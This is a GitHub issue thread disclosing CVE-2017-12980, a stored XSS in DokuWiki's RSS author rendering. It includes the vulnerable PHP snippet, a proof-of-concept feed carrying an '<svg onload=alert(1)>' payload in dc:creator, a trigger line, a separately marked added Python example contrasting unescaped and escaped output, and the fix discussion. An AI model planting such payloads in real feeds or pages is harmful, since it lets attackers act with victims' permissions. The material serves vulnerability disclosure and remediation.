CVE-2017-12980 Stored XSS in xhtml.php with RSS/Atom feed #2081

Closed
trichimtrich opened this Issue Aug 16, 2017 · 3 comments

trichimtrich commented Aug 16, 2017

Bug

The author tag in an RSS/Atom feed is not well sanitized (with the default config of SimplePie, HTML special characters are not stripped, and DokuWiki uses the result directly). So an attacker can force others to request a remote RSS/Atom feed that contains malicious JavaScript and make requests with their permissions.

Detail

/inc/parser/xhtml.php

function rss($url, $params) {
    ...
    if($params['author']) {
        $author = $item->get_author(0);
        if($author) {
            $name = $author->get_name();
            if(!$name) $name = $author->get_email();
            if($name) $this->doc .= ' '.$lang['by'].' '.$name;
        }
    }
    ...
}

PoC

remote RSS

<?xml version="1.0" encoding="ISO-8859-1"?>
<rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns="http://purl.org/rss/1.0/" xmlns:admin="http://webns.net/mvcb/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/" xmlns:syn="http://purl.org/rss/1.0/modules/syndication/" xmlns:taxo="http://purl.org/rss/1.0/modules/taxonomy/" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0">
<item rdf:about="https://aaaapolitics.slashdot.org/story/17/08/16/1911253/after-losing-support-trumps-business-and-manufacturing-councils-are-shutting-down?utm_source=rss1.0mainlinkanon&amp;utm_medium=feed">
<title>testing title</title>
<description>testing desc</description>
<dc:creator><![CDATA[  aaaa<svg onload=alert(1)>  ]]></dc:creator>
<dc:date>2017-08-16T19:20:00+00:00</dc:date>
</item>
</rdf:RDF>

dokuwiki document

{{rss>http://localhost/cc.rss 1 author date description 1h }}
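The following is an added example, not DokuWiki or SimplePie code. It parses a feed constructed after the PoC above, pulls out the dc:creator value the way the report says SimplePie returns it (raw text, CDATA unwrapped, no escaping), and contrasts the concatenation done by the vulnerable rss() renderer with a variant that escapes HTML special characters first. The actual DokuWiki fix lives in #2086 and is not reproduced here; the escaped variant only illustrates the class of fix.

```python
"""Added example: author-field injection via an RSS 1.0 feed and its escaped rendering.

Not DokuWiki or SimplePie code; the feed below is constructed for the example,
modelled on the PoC in the issue report.
"""
import html
import xml.etree.ElementTree as ET

# Constructed feed: dc:creator carries an <svg onload=...> payload inside CDATA,
# exactly as in the PoC. The rdf:about URL is a placeholder.
MALICIOUS_FEED = b"""<?xml version="1.0" encoding="ISO-8859-1"?>
<rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
         xmlns="http://purl.org/rss/1.0/"
         xmlns:dc="http://purl.org/dc/elements/1.1/">
<item rdf:about="http://example.invalid/story/1">
<title>testing title</title>
<description>testing desc</description>
<dc:creator><![CDATA[  aaaa<svg onload=alert(1)>  ]]></dc:creator>
<dc:date>2017-08-16T19:20:00+00:00</dc:date>
</item>
</rdf:RDF>
"""

# Constructed benign feed, to show the escaped rendering leaves normal names alone.
BENIGN_FEED = b"""<?xml version="1.0" encoding="UTF-8"?>
<rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
         xmlns="http://purl.org/rss/1.0/"
         xmlns:dc="http://purl.org/dc/elements/1.1/">
<item rdf:about="http://example.invalid/story/2">
<title>benign title</title>
<dc:creator>Jane Doe</dc:creator>
</item>
</rdf:RDF>
"""

NS = {
    "rss": "http://purl.org/rss/1.0/",
    "dc": "http://purl.org/dc/elements/1.1/",
}


def feed_authors(xml_bytes: bytes) -> list:
    """Return the stripped dc:creator text of each item.

    This mirrors what the report says SimplePie's get_author(0)->get_name()
    hands back by default: the element text with CDATA unwrapped and no HTML
    escaping applied, so markup inside the author field survives intact.
    """
    root = ET.fromstring(xml_bytes)
    authors = []
    for item in root.findall("rss:item", NS):
        creator = item.find("dc:creator", NS)
        if creator is not None and creator.text and creator.text.strip():
            authors.append(creator.text.strip())
    return authors


def render_author_vulnerable(name: str, by_word: str = "by") -> str:
    """Same shape as the xhtml.php snippet: the name goes into the HTML as-is."""
    return " " + by_word + " " + name


def render_author_escaped(name: str, by_word: str = "by") -> str:
    """Hardened variant: escape HTML special characters before the name
    reaches the document (same effect as PHP's htmlspecialchars)."""
    return " " + by_word + " " + html.escape(name, quote=True)


def contains_markup(fragment: str) -> bool:
    """True if the rendered fragment still contains a raw angle bracket."""
    return "<" in fragment or ">" in fragment


if __name__ == "__main__":
    for name in feed_authors(MALICIOUS_FEED) + feed_authors(BENIGN_FEED):
        print("vulnerable:", render_author_vulnerable(name))
        print("escaped:   ", render_author_escaped(name))
```

Run it and the vulnerable line carries the `<svg onload=alert(1)>` tag straight into the page output, while the escaped line turns the angle brackets into `&lt;` and `&gt;`; the benign name renders identically in both variants.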
phy25 (Collaborator) commented Aug 20, 2017

Reproducible at https://www.dokuwiki.org/sandbox:issue-2081. A fix is available at #2086.

trichimtrich commented Aug 20, 2017

The fix works well.

fgeek commented Aug 22, 2017

Please use CVE-2017-12980 for this issue.

splitbrain added a commit that referenced this issue Aug 22, 2017

@splitbrain splitbrain changed the title from [Security] Stored XSS in xhtml.php with RSS/Atom feed to CVE-2017-12980 Stored XSS in xhtml.php with RSS/Atom feed Aug 22, 2017

@splitbrain splitbrain closed this Aug 22, 2017

bug added a commit that referenced this issue Aug 22, 2017

bug added a commit that referenced this issue Aug 22, 2017

splitbrain added a commit that referenced this issue Aug 27, 2017

Merge branch 'master' into retrytests
* master: (407 commits)
  do not export the appveyor config
  Added appveyor config for automated windows testing
  Update check supports HTTPS
  fixed some style errors found by scrutinizer
  removed unused, empty files
  some cleanup fpr set_metadata test
  added one more test for internal links
  parsertests: replaced var keywords and added type hints
  Fix p_set_metadata damaging contributors with numeric ID
  Add tests for array_replace part of set_metadata
  Fix rendering null $language going to GeSHi (fixes #2088)
  Fix RSS syntax XSS bug (#2081)
  Fix sanitation of $language for code highlighting (fixes #2080)
  translation update
  fix(config): empty string is valid for numericopt
  removed old tpl_content_core method
  updated composer dependencies
  Removed progressbar from searchform
  Release preparation
  translation update
  ...